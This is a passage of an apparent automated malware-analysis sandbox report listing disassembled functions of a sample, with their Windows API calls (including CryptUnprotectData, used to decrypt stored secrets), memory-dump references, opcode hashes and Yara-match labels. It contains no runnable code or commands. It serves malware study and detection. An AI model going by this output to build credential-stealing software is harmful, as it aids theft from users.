                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: d2b344473f2a18e03b41b262aa512a49d7abc87b8956dc75610d5e85417014bd
                                        • Instruction ID: d138f905c6c9e18f0ba124a53eb546c6361714edec3bf0c81f2da15d17b37349
                                        • Opcode Fuzzy Hash: d2b344473f2a18e03b41b262aa512a49d7abc87b8956dc75610d5e85417014bd
                                        • Instruction Fuzzy Hash: 8911A1B1909319EBEB208B54ED45FA9BB78FB44711F1043E5F61A932D0DB745A408B54
                                        Function 00193970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(0019E120,00000000,00000001,0019E110,00000000), ref: 001939A8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00193A00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 9717b9d2d3f1f70376a21d224ba21de3388b18fe49c9807f3d8e754724465ad1
                                        • Instruction ID: 16e1a4215ef81328b8ee601acd60e438fbcdb42655614a88e74053ed6db9821c
                                        • Opcode Fuzzy Hash: 9717b9d2d3f1f70376a21d224ba21de3388b18fe49c9807f3d8e754724465ad1
                                        • Instruction Fuzzy Hash: F941E870A40A289FDB24DB58CC95F9BB7B5BB48702F4041D8E618E72E0D7B1AE85CF50
                                        Function 0018A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0018A2D4
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0018A2F3
                                        • LocalFree.KERNEL32(?), ref: 0018A323
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: ea988fa2bdf2db482a739a7c65bace58341c93924dc0d9bb5bf27150480889f5
                                        • Instruction ID: 284c78656c2e43d3b015bb2783965e1c107a6dd1fe5d95b0d997e31dd194a5e0
                                        • Opcode Fuzzy Hash: ea988fa2bdf2db482a739a7c65bace58341c93924dc0d9bb5bf27150480889f5
                                        • Instruction Fuzzy Hash: 161193B8A00209AFDB04DFA4D984AAEB7B5FF89301F104569FD15A7350D770AA50CF61
                                        Function 005D96D5 Relevance: 4.1, Strings: 2, Instructions: 1620COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: Q;$L)
                                        • API String ID: 0-847948008
                                        • Opcode ID: 87f84542222621e3e68ea86fba506a9649eb7abd42fe3480aaabdda0b099d7e1
                                        • Instruction ID: 8d39e81bd7ab55c70629e9828fd9c3bde5b6437199f6409840486f3112149886
                                        • Opcode Fuzzy Hash: 87f84542222621e3e68ea86fba506a9649eb7abd42fe3480aaabdda0b099d7e1
                                        • Instruction Fuzzy Hash: 40B207F3A0C2009FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C7744E67558058697
                                        Function 001F4BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?$__ZN
                                        • API String ID: 0-1427190319
                                        • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction ID: fdeeee25bcce8288b5986953855cace6b3ab89a00f66bd75d8652b8f4a797337
                                        • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction Fuzzy Hash: 407205B2908B189BD718CF18C89067AB7E3BFD5320F598A1DF7A59B291D3709C419B81
                                        Function 0064F3F2 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 3Gyv$3Gyv
                                        • API String ID: 0-2465663761
                                        • Opcode ID: 9ee9c7ed6020d9b159c1d371862e3ed443d1e6740680111e8b7d99e453b91e7f
                                        • Instruction ID: 496d55064563c5763a207507d7bc1caed912a92991acd09f8924339eebab1ec7
                                        • Opcode Fuzzy Hash: 9ee9c7ed6020d9b159c1d371862e3ed443d1e6740680111e8b7d99e453b91e7f
                                        • Instruction Fuzzy Hash: 8F81F8B260C2009FE714AF29EC41B7FB7E6EBD4720F25853EE6C6C2744EA3548029657
                                        Function 0059690C Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: Fi[o$u\o
                                        • API String ID: 0-139046059
                                        • Opcode ID: 4acdff5de05ca1d2e54fb3c333ac54185749f9557dc30cae9ea8d06bdb24c4bb
                                        • Instruction ID: 43d54b590c48cfc78250d7aeaad05b708d5145d15245972211a2521938b0d10b
                                        • Opcode Fuzzy Hash: 4acdff5de05ca1d2e54fb3c333ac54185749f9557dc30cae9ea8d06bdb24c4bb
                                        • Instruction Fuzzy Hash: FB518CF3E041145BF318592DDC1477AB696DFE4720F2B823DEA8A57784D87A9C0582C7
                                        Function 001D5DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: xn--
                                        • API String ID: 0-2826155999
                                        • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction ID: 63dc35f18ddf06665d87a8e60ba4ccbd68cc6cc76b3f13c2c8120819c5592184
                                        • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction Fuzzy Hash: 00A203B2D042688AEF18CB68C8A03FDB7B1EF55300F1842ABD5567B381E7759E85DB50
                                        Function 001D4DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction ID: 3019dd0163976a8543115e410aeecbaceee86dcafd767f31f2057982e4c35fc1
                                        • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction Fuzzy Hash: 80E1CF316083459FCB25DF28C8917AEB7E2EF89300F554A2EE5D99B391D7319845CB82
                                        Function 001D4868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction ID: bc13bf290b363656639844ecbfff138d44c682aca7757dfae079c2b3ab0f97c7
                                        • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction Fuzzy Hash: 90E1C4316087059FCB24CF18C8917AEB7E2EFD9310F15892EE98A9B351D730AC45CB46
                                        Function 001EE258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: UNC\
                                        • API String ID: 0-505053535
                                        • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction ID: 0049e0f814cb7329ff0e969648a0ed13a615db7cf7c54097ef84c952a5714b35
                                        • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction Fuzzy Hash: 50E14D71D04AE58FEB14CF1AC8843BEBBF2AB85314F198169D4A45F2D2D7358D46CB90
                                        Function 005B8089 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
